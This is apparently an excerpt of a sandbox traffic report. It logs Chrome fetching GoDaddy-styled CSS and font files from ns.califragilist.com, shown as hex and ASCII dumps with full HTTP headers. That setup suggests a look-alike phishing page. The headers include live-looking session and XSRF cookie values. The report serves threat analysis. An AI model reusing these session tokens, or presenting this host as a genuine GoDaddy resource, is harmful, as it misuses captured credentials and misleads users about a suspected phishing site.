                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 23 64 33 64 33 64 33 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 76 61 72 28 2d 2d 75 78 2d 31 39 77 72 33 6b 71 2c 31 70 78 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 61 5b 68 72 65 66 5d 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 66 69 65 6c 64 2c 20 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 73 75 67 67 65 73 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 66 6f 6e
                                                                                                                                              Data Ascii: #d3d3d3); border-width: var(--ux-19wr3kq,1px); border-radius: var(--ux-2jubes,2px);}#sections_godaddy .ux-alert a[href] { color: inherit; display: inline;}#sections_godaddy .ux-text-entry-field, .ux-text-entry-suggestion { fon
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0d 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 64 2d 66 6c 65 78 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6c 65 78 2d 72 6f 77 20 7b 0d 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63
                                                                                                                                              Data Ascii: right: 8px;}#sections_godaddy .container-fluid::after { content: ""; display: table; clear: both;}#sections_godaddy .d-flex { display: flex!important;}#sections_godaddy .flex-row { flex-direction: row!important;}#sec
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 70 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2d 6f 75 74 6c 69 6e 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 62 75 74 74 6f 6e 2c 69 6e 70 75 74 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 76 69 73 69 62 6c 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 20 7b 0d 0a 20 20 2d 77 65 62 6b 69
                                                                                                                                              Data Ascii: outline: var(--uxp-focus-visible-outline);}#sections_godaddy button,input { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; overflow: visible;}#sections_godaddy button,html [type=button] { -webki
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 20 20 6d 61 72 67 69 6e
                                                                                                                                              Data Ascii: background-clip: border-box; margin-bottom: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .ux-card { border-radius: var(--ux-2jubes,2px); margin
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 2d 73 69 7a 65 2d 31 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 30 2e 32 35 72 65 6d 29 2a 31 29 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 30 2e 32 35 72 65 6d 29 2a 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 75 78 2d 62 75 74 74 6f 6e 2d 69 6e 6c 69 6e 65 29 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6b 79 79 62 70 62 2c 76 61 72 28 2d 2d 75 78 2d 75 6e 78 39 69 32 2c 23 66 66 66 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74
                                                                                                                                              Data Ascii: -size-1 { padding: calc(var(--ux-1sbfig8,0.25rem)*1) calc(var(--ux-1sbfig8,0.25rem)*3);}#sections_godaddy .ux-button:not(.ux-button-inline):not([disabled]):hover { color: var(--ux-1kyybpb,var(--ux-unx9i2,#fff));}#sections_godaddy .ux-but
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 76 61 72 28 2d 2d 75 78 2d 63 78 62 65 38 67 2c 31 72 65 6d 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 6c 69 6e 65 48 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 75 78 2d 31 64 72 79 32 70 6a 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 69 72 38 76 74 76 2c 76 61 72 28 2d 2d 75 78 2d 67 66 6e 75 70 76 2c 73 61 6e 73 2d 73 65 72 69 66 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 75 78 2d 34 67 31 72 32 74 2c 76 61 72 28 2d 2d 75 78 2d 6a 34 30 79 79 64 2c 34 30 30 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 76 61 72 69 61 74 69 6f 6e 2d 73 65 74 74 69 6e 67 73 3a 20 76 61 72 28 2d 2d 75 78 2d 31 78 73 70 63 30 34 2c 76 61 72
                                                                                                                                              Data Ascii: var(--ux-cxbe8g,1rem)); --uxText--lineHeight: var(--ux-1dry2pj,var(--ux-jw5s9j,1.5)); font-family: var(--ux-1ir8vtv,var(--ux-gfnupv,sans-serif)); font-weight: var(--ux-4g1r2t,var(--ux-j40yyd,400)); font-variation-settings: var(--ux-1xspc04,var


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              61192.168.2.1849824188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1305OUTGET /GDSherpa-bold.woff2 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC1109INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: font/woff2
                                                                                                                                              Content-Length: 28000
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-bold.woff2"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:25 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUbkJLEwzCEmJcshc7bYjogqJ6mWVb5jBSXbb0oypi4wu9X8ulF1nUM%2BewXz57NP6YQ%2FMN1I1wRwg3PdhTB3I4c2O1NqBdstGTsMGfKMb6IURMABn8jjDlWO2p6Q5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3370&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2274&delivery_rate=848271&cwnd=251&unsent_bytes=0&cid=3bfe160189eb8ff8&ts=52&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455f9dc46bd2-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1883&delivery_rate=2366013&cwnd=251&unsent_bytes=0&cid=762364fff34a976f&ts=596&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC260INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                                                                                                              Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 9b c5 a1 13 3e 5b 8f 37 84 95 1b dd c4 fb 92 f6 31 3f 3f e9 b5 33 1b 3f 74 d0 95 c5 71 45 fc 1e 66 c9 95 b6 19 62 97 c3 e1 2c c8 92 46 77 63 70 38 ab af 91 34 5e 02 5e 78 9e b1 7c a7 82 a3 c6 52 6f 3c 25 dc d7 22 2e e1 09 81 7e 30 8f 94 71 ee b7 f8 72 50 88 85 47 11 0b b2 82 f4 97 de 52 ff cd dd bc c0 2d 9d bc 7b 4f 92 51 65 4a a9 db c1 16 d8 36 ec 45 cd 8e 9e f6 ff fe b2 ac aa 7b ef 7b 1f 1a d4 a2 16 d0 2c 68 a5 21 8c cc 83 5f bd 04 bd dd 0b 7f 24 03 cb 33 a9 9d 63 46 40 11 87 3e b9 8f a3 0d a2 0d 1d 8d 74 c0 6f f3 ef d1 46 63 20 88 95 18 59 53 8c af ac 8d fe 73 19 56 d4 8c c4 6a b4 99 8b 0e 75 6b 06 60 6e 0e 03 d1 c6 d1 b1 01 23 96 c5 c6 c6 36 d8 1a 18 b1 8d 31 60 6b 62 64 8c 14 5a 05 01 29 e3 8a 78 01 15 fa 46 e3 03 eb fe fa b7 95 f8 54 84 e7 5f 9d ef
                                                                                                                                              Data Ascii: >[71??3?tqEfb,Fwcp84^^x|Ro<%".~0qrPGR-{OQeJ6E{{,h!_$3cF@>toFc YSsVjuk`n#61`kbdZ)xFT_
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 09 13 27 4d 9e 32 7d c6 cc 59 b3 e7 cc 1d dc f5 1e f7 b9 78 c9 46 1b f3 73 92 35 88 21 b9 90 06 4c a1 ec 44 53 63 41 4a 18 28 48 6b 6b a6 b0 10 96 b2 ea 6e 60 12 8b 54 27 3a 88 0d 21 91 cf 78 89 b0 b1 d8 18 21 22 c5 da ac b1 1d e5 ca f6 61 f6 a8 56 58 53 71 3c 02 8d 44 a2 a2 41 23 e9 58 a6 4f 15 82 22 96 74 9e aa c0 f4 bc 86 89 99 78 96 9e cc 06 39 a9 dd f8 40 7f e2 54 d8 c2 6b b4 1b e6 c5 e1 04 8c 66 32 96 29 88 85 e4 1c c6 0e b7 46 86 56 d0 e4 51 61 62 15 4f 01 27 e6 16 29 b4 dd 95 b0 ee 43 0c a3 4b ea 60 8c c0 09 ad e3 6f 88 46 c1 31 3e 16 2f a6 93 a3 2c a1 5c 8f a6 25 41 94 a6 fc ba 38 e6 29 59 8d b8 09 b2 d6 61 05 83 56 c2 bc b1 90 44 0e c5 08 6b 2c 91 ea dc d6 bb e5 7b c6 4f c5 ff d5 85 d4 c1 52 07 ca a0 02 aa a0 01 9a d3 5d 78 fe f2 9b 77 4a 1a 27
                                                                                                                                              Data Ascii: 'M2}YxFs5!LDScAJ(Hkkn`T':!x!"aVXSq<DA#XO"tx9@Tkf2)FVQabO')CK`oF1>/,\%A8)YaVDk,{OR]xwJ'
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: ff 94 fa eb 3b bb 83 8b 02 47 f2 cd 86 8c 7f 4e e1 32 e7 d8 15 ae 79 f8 47 8f fa 05 96 b1 d9 36 75 60 b8 9c 89 84 ab 0f ce b6 0d b0 e5 e9 e7 53 21 f4 1c 5b 5e ef 2c e5 1d e5 33 06 58 b9 e3 bf 4b 32 40 cb 15 6f 86 0b 94 4f 42 ca e2 c7 88 be 73 54 45 83 70 c0 53 0f 20 a4 a1 c9 b1 40 1c 44 ef 81 97 5a db 50 18 22 a5 a5 70 8f 5f eb 4d ed 09 f5 04 d0 0c 6c ac d1 b3 da a0 5c ef 6b c9 93 48 d8 73 12 fe 6f 47 42 f7 de 47 8d 7e 39 a2 63 8a a3 c3 11 1b f3 63 3b c1 97 86 57 c5 13 9c 32 39 ea a5 bd 1f e9 a5 a8 95 ab e9 c3 25 f8 f4 7b a0 cc 90 77 51 d2 bd f8 79 19 f2 a2 47 74 0c d9 1e 6c 61 83 6b 8d 97 d4 f3 04 20 e7 2b 63 66 08 c7 02 c4 37 95 09 81 4e 27 7b dd 4d 31 ea be 9b 63 e0 4e dd b4 72 4e ab 92 fc 99 eb 56 d9 e2 40 12 0c 91 08 4c 3e fa 7e 9c af 07 c1 b5 da 13
                                                                                                                                              Data Ascii: ;GN2yG6u`S![^,3XK2@oOBsTEpS @DZP"p_Ml\kHsoGBG~9cc;W29%{wQyGtlak +cf7N'{M1cNrNV@L>~
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 46 0f 3c c3 ed 46 2e 7c 76 0c b0 f5 48 c7 45 ff c9 ed f1 ab 91 fa 72 a5 ca 0f 4f 04 7a 13 ca b1 46 a7 b9 aa 87 1a 89 7e 63 b0 92 a4 e6 f9 de 46 9f dd 71 be 20 de e9 fd 8c 00 5a c9 1e 8a 23 4a 27 a0 ce 42 1e 5b 6d 40 40 3c bf 46 bf 87 3b 88 a3 bb ff 22 63 84 3f f6 b8 70 7f e1 e6 bf 7e 53 e1 e5 89 5b 97 e8 15 a4 24 20 35 29 73 9b 30 1c 97 3a f4 09 c6 df 6d af a6 d6 b1 39 44 4c 43 64 c3 d7 30 ff 90 97 df d3 35 dd 6c dd 23 7d 72 b0 63 e6 28 7b ec 1b cb 1d 01 12 cf d5 46 05 58 bf 47 3d 6f b5 4b 00 12 0c 03 15 52 e1 0d 36 3c 0b fa cd 75 d3 91 a9 e1 be 6c 7c 7c 41 17 7b 2e f2 7f 71 2f 44 85 82 85 df 24 0a 48 e2 fb 9b a7 1a a3 28 98 5c 14 26 db c4 f1 5a 8c 40 9b b9 94 2f 3d 29 8b ec 2f f5 80 6e 96 fc af e6 21 af cd ce e9 46 a9 7d 49 30 8f c0 3a ad aa d4 e8 89 4b
                                                                                                                                              Data Ascii: F<F.|vHErOzF~cFq Z#J'B[m@@<F;"c?p~S[$ 5)s0:m9DLCd05l#}rc({FXG=oKR6<ul||A{.q/D$H(\&Z@/=)/n!F}I0:K
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 71 16 6d 89 15 43 a2 4a 3b 58 10 63 15 56 19 85 c5 5a 67 71 36 93 89 64 c8 42 5e fa 4a 16 a3 48 89 c8 fb 86 a8 c7 95 6b f6 a2 f4 d9 42 5c e7 8c c8 5f 20 a2 10 a1 50 0e 9d 41 74 56 1d 2a 51 71 92 c8 4a 96 0a ed 93 8a 89 29 51 0e e3 ab 6a 60 7d 4b 03 9c 1f 74 2c 5e 9b da c2 4a 6b 65 09 da 58 6f 5f b0 f2 da 59 6e 1d ac 82 4e 2a fd d5 ab 8a a3 e8 d1 8b ac 4f 3f 69 03 98 28 06 61 15 0d b1 74 67 59 6f d3 2c c5 28 2b 60 8c 95 31 ce 0a 9a 60 9d 2c b0 42 a6 58 17 4b ac b0 19 96 6a 96 c5 9b 63 15 b1 58 bc 05 56 de 22 4b b1 c4 2a 5a 66 05 ad b0 9e ae b3 de 96 59 0a 36 eb ea 6b 96 62 83 e5 75 85 1a 7d 6d ad 20 dd 1d 5e d6 db 5d 77 71 bb cf 4a 7b 30 1e c5 43 1f e1 7d f2 0d c1 66 27 e5 c9 db 87 00 bb b4 8a 46 e1 c6 40 ba 35 a4 9b 26 94 36 b1 ce 29 b7 13 1c 3b 62 83 77
                                                                                                                                              Data Ascii: qmCJ;XcVZgq6dB^JHkB\_ PAtV*QqJ)Qj`}Kt,^JkeXo_YnN*O?i(atgYo,(+`1`,BXKjcXV"K*ZfY6kbu}m ^]wqJ{0C}f'F@5&6);bw
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 6f d5 3a fd e6 a3 ea 80 0b a6 f8 b7 66 9b 6a f9 f3 de b0 6c 5d 91 41 fb 55 e9 61 b1 07 7f af 1a 07 d4 e9 74 d4 71 87 1d 53 6b 42 d2 61 a3 2a dc 56 2f f9 94 4b e8 6e 35 a0 95 fc 21 95 ba 39 12 3d ac 96 41 e5 cc 83 5e 3e db 79 03 f8 0c 5e cb 96 bf 92 2a 5b bd e6 b9 2a a9 bb e2 91 c7 9e 78 e6 b9 57 66 7d b3 65 db 77 bf e3 de 80 35 64 25 fd 36 92 47 cf 3e 7d 5f 6e e3 ad 58 7f be b1 99 be cd 15 de 0b 26 5e 92 c5 62 ef 35 07 6f 38 79 c7 d1 5b 2e 56 29 5a 45 f7 91 a7 7f 79 f9 44 ce 02 0f ff f0 f2 93 bc 4e c0 f5 02 6f c0 b8 91 b2 35 fb 6e 15 7c 8b bd 77 6a dd 43 b1 df 38 9a 7b 42 ef 12 76 b7 75 e1 ed 45 05 8a e8 20 b2 1d 95 ee 0b e9 e8 2e 62 3b 89 e9 da 99 9a 4b 4e f6 73 ac b7 c3 fd 49 9b 73 6e 90 0b 43 9c 1f 2c 2e 44 fc 50 49 23 24 0c 93 1a 2e 39 94 86 ab 72 e2
                                                                                                                                              Data Ascii: o:fjl]AUatqSkBa*V/Kn5!9=A^>y^*[*xWf}ew5d%6G>}_nX&^b5o8y[.V)ZEyDNo5n|wjC8{BvuE .b;KNsIsnC,.DPI#$.9r
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 85 21 1e 96 9d a0 a3 b1 c2 7d 45 9d 56 20 61 10 ab 5e 8e af b7 44 c1 41 79 72 28 b2 40 92 a6 76 40 d7 e9 9b 4e 17 70 c3 eb 07 ce b7 44 c7 5b c7 63 f9 4a fd d8 4e 56 2f cf af ee d8 24 78 49 15 c6 14 f7 ab 2c a4 75 fe c9 c2 66 1c d6 24 71 d3 2d 29 99 d0 52 63 a2 e2 cd b4 65 85 a7 0e 36 57 41 36 56 58 30 d6 23 83 e3 70 94 17 66 1c c2 45 aa ae cb b4 7a ea 60 12 7c b4 a5 f8 88 b5 1e 5e c2 f4 84 11 6c b3 6a 2f 19 20 76 93 d4 30 8c a0 43 60 5a 02 b6 86 06 43 15 03 f8 e9 de 72 8e 3a 34 91 e2 f4 87 5f a5 aa 47 88 20 c9 fa fb ce 20 2b 8c 56 d2 ed aa 25 a8 23 24 28 3a a4 17 c2 5e 60 66 2a 8e 73 a7 de 62 48 89 0f 92 c8 10 e9 ad 88 1a eb f2 72 14 e7 b9 94 56 79 05 a1 40 f2 ea 9d 11 72 0f f9 22 d5 49 de b4 7f 22 1f 9b c6 4c 1d c3 1e 69 b9 93 d5 97 ae 95 c3 b8 e5 4c b2
                                                                                                                                              Data Ascii: !}EV a^DAyr(@v@NpD[cJNV/$xI,uf$q-)Rce6WA6VX0#pfEz`|^lj/ v0C`ZCr:4_G +V%#$(:^`f*sbHrVy@r"I"LiL
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: f3 ca 66 a2 92 b8 04 af ef 77 01 2a 09 ff 91 f0 69 77 23 61 21 25 46 28 08 a1 1a b9 32 ee a4 7a 2c 43 f1 5d 0f d7 d9 65 89 90 f3 df f1 15 f0 d2 09 5d e7 95 37 00 18 28 22 e9 a2 1e b9 c0 9b ab 68 a3 79 74 d9 52 b7 93 7a dc 8b 03 36 d0 90 31 30 a2 22 39 30 0b e9 af c4 ac ee 1a a5 27 78 e5 94 89 1f 92 35 2f d0 e1 36 92 dc 13 cf 16 14 2d f4 74 a5 e6 a9 57 17 69 9d 9f 61 97 5b a0 ea 8a dd 0a 65 cc b0 71 0d 44 47 a3 1c 7c 10 58 24 97 38 21 0c 62 5b 68 70 c9 54 52 48 b1 b4 62 11 48 69 de 26 c2 4b bb 1b 92 67 61 05 df cc 2e 5d fc b1 d9 57 bf 1d 61 25 09 cc c4 e7 b3 02 52 4f 2e 36 c9 82 17 10 4f b8 dd ab 21 07 59 30 8a 5a 7d 78 6c a5 b8 4d f9 3c d6 d1 01 2d e6 7a 34 d1 d3 99 1a 0f d5 80 85 cc 46 91 bb 8c a9 09 ef 55 d8 6b db 54 a6 bb 17 32 84 0c ab 6e 0b 92 24 dc
                                                                                                                                              Data Ascii: fw*iw#a!%F(2z,C]e]7("hytRz610"90'x5/6-tWia[eqDG|X$8!b[hpTRHbHi&Kga.]Wa%RO.6O!Y0Z}xlM<-z4FUkT2n$
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 52 bf 52 4c 70 57 bf 97 33 c0 a8 71 9a 82 4d 81 d9 7c bc f7 d8 5f 66 46 0a 04 a5 9f 95 0f 3d fc 2f 17 3f 5e 43 fd 6c 6d e7 27 06 d3 df 98 97 6a 86 dc 2e 0c ba 71 ba ba 58 36 2e ce 5f 11 69 c0 a3 ae 38 d2 24 16 b8 20 50 cc fd 01 0f eb cb 42 75 0d 29 de 40 02 76 62 ac 0d d6 cc b6 42 3e f2 ed f1 93 3b 5f aa 81 90 71 ec ca ab 8a 73 b5 c4 68 3f 46 e1 c8 59 5d c2 3d da bf f9 eb 22 81 08 df 70 3e a9 f4 1e fe de 91 8e df 17 6f db e8 29 45 d2 10 bf 4e 8c 3d 28 54 f9 9c 6a 56 2d d4 f3 f9 8d 6f bb b1 5d 75 37 03 67 77 4b 0b 12 c2 6e 9b 97 47 5d ba be c7 ca 44 70 e6 80 2c 4f 95 71 9e 10 ea e0 14 1e ce 65 50 e5 34 a9 3e d6 97 ef 56 5f 47 dc fc 15 c7 4e 5d ec c5 c1 a9 61 2a 24 cf 41 e5 e9 90 4b f9 62 6e 66 8b 6c 3a 4b e7 cd 48 10 60 54 48 67 78 34 48 47 e8 90 d4 d5 e8
                                                                                                                                              Data Ascii: RRLpW3qM|_fF=/?^Clm'j.qX6._i8$ PBu)@vbB>;_qsh?FY]="p>o)EN=(TjV-o]u7gwKnG]Dp,OqeP4>V_GN]a*$AKbnfl:KH`THgx4HG


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              62192.168.2.1849826188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1304OUTGET /GDSherpa-bold.woff HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
